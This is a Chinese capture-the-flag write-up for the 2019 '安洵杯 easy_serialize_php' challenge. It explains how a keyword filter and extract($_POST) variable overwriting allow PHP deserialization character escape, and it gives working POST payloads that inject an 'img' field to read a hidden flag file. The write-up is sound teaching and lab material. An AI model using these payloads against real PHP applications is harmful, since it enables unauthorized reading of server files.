• [安洵杯 2019] easy_serialize_php


    源码分析

    建议先看 详解PHP反序列化中的字符逃逸

    题目直接给了源码,第一步,先搞明白代码的逻辑,本文无图片

    filter 函数将 $img 中含有的 数组中的元素 替换为 空

    function filter($img){
        $filter_arr = array('php','flag','php5','php4','fl1g');
        $filter = '/'.implode('|',$filter_arr).'/i';
    	// 正则表达式 /php|flag|php5|php4|fl1g/
        return preg_replace($filter,'',$img);
    }
    

    然后看到 extract($_POST); 说明有变量覆盖

    然后是如果 img_path 为空,就 base64_encode 字符串 guest_img.png 否则就先 base64_encode img_pathsha1 加密

    if(!$_GET['img_path']){
        $_SESSION['img'] = base64_encode('guest_img.png');
    }else{
        $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    }
    

    然后就是对 session 进行序列化并执行 filter 函数,这里就应该会存在字符逃逸了

    $serialize_info = filter(serialize($_SESSION));
    

    最后是对 $_GET['f'] 的判断,执行不同功能,在 phpinfo 发现 auto_append_file : d0g3_f1ag.php

    if($function == 'highlight_file'){
        highlight_file('1.php');
    }else if($function == 'phpinfo'){
        eval('phpinfo();'); //maybe you can find something in here!
    }else if($function == 'show_image'){
        $userinfo = unserialize($serialize_info);
        echo file_get_contents(base64_decode($userinfo['img']));
    } 
    

    漏洞分析

    现在的目的很明确,就是要读取 d0g3_f1ag.php 这个文件,利用逃逸使 session 中的 img 字段为 ZDBnM19mMWFnLnBocA==base64_encode(d0g3_f1ag.php) ,然后在 show_image 中读取。

    由于 extract($_POST) 的存在,可以利用变量覆盖修改 $_SESSION["user"]$_SESSION['function']$function,或者是在 _SESSION 中插入参数

    user + function 逃逸

    先看一个正常的 session 文件经过序列化之后的结果,user 和 function 字段是可控的

    a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    这里就有两个位置可以逃逸,先看一下 function 这里

    a:3:{s:4:"user";s:5:"guest";s:8:"function";s:7:"aphpphp";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    filter 处理之后

    a:3:{s:4:"user";s:5:"guest";s:8:"function";s:7:"a";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    我们的目标,发现这样行不通,覆盖掉 img 字段后,无法控制 object 的注入,就考虑结合 user 一起

    a:3:{s:4:"user";s:5:"guest";s:8:"function";s:39:"a";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";s:6:"object";s:6:"inject";}
    

    变成这样 {1} {2} 为可控输入,要注入对象的话,{2} 的内容长度一定会大于 10,所以考虑覆盖掉 ";s:8:"function";s:10:" ,长度为 23,扩展成 3 或 4 的倍数( 根据 filter 函数),就是 ";s:8:"function";s:10:"a

    a:3:{s:4:"user";s:5:"{1}";s:8:"function";s:10:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    这就变成这个样子

    a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:10:"a{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    经过 filter 函数处理

    a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    然后就是 {2} 的输入内容,要让 img 字段为 ZDBnM19mMWFnLnBocA==base64_encode(d0g3_f1ag.php) ,还要闭合前面的 " ,那么 {2} 就是 ";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";

    a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    这样还存在问题,"; 如何处理,可以结合 php 反序列化在 } 后的数据将直接被丢弃这个特点,直接构造一个结束符。{2} 为 ";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";

    a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    这还有一个问题,这个反序列化之后的数组应该有 3 个元素,这样构造只剩下 2 个,这就需要再加一个元素,随便加即可

    a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    反序列化结果

    array(3) {
      'user' =>
      string(24) "";s:8:"function";s:10:"a"
      'img' =>
      string(20) "ZDBnM19mMWFnLnBocA=="
      'a' =>
      string(1) "a"
    }
    

    payload

    _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}&function=show_image
    

    插入字段逃逸

    前面说了,可以利用 user 和 function 逃逸,也可以在 session 中插入字段,进行逃逸,原始的结果

    a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    post 插入字段参数 _SESSION[user]=aaaa&_SESSION[function]=bbbb&_SESSION[cccc]=dddd 之后

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:4:"cccc";s:4:"dddd";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    不动 user 和 function ,img 在插入的字段之后,可控点就是,session 的字段及对应的参数,利用 {1} 逃逸,利用 {2} 注入

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:4:"{1}";s:4:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    ";s:4:" 长度为 7 ,但是对象注入长度肯定大于 10,那就是 ";s:10:" 长度 8,则 {1} 就是 flagflag

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"flagflag";s:10:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    {2} 处进行闭合 + 对象注入的操作,闭合前面的 " ,插入分隔符 ; ,闭合 {} 结束符,插入 s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"flagflag";s:10:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    经过 filter 函数处理

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"";s:10:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    这就发现一个问题,s:8:""; 这里只有属性名,缺少属性值,需要加上

    a:4:{s:4:"user";s:4:"aaaa";s:8:"function";s:4:"bbbb";s:8:"";s:10:"";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    

    反序列化结果

    array(4) {
      'user' =>
      string(4) "aaaa"
      'function' =>
      string(4) "bbbb"
      '";s:10:"' =>
      string(1) "a"
      'img' =>
      string(20) "ZDBnM19mMWFnLnBocA=="
    }
    
  • 相关阅读:
    初试 Elastic Search
    索引分类
    Nginx
    LINQ入门
    CSS学习
    Keras 安装
    火车进站
    2016年网易笔试编程题2
    Java GC
    linux 安装 mysql
  • 原文地址:https://www.cnblogs.com/peri0d/p/12526069.html
Copyright © 2020-2023  润新知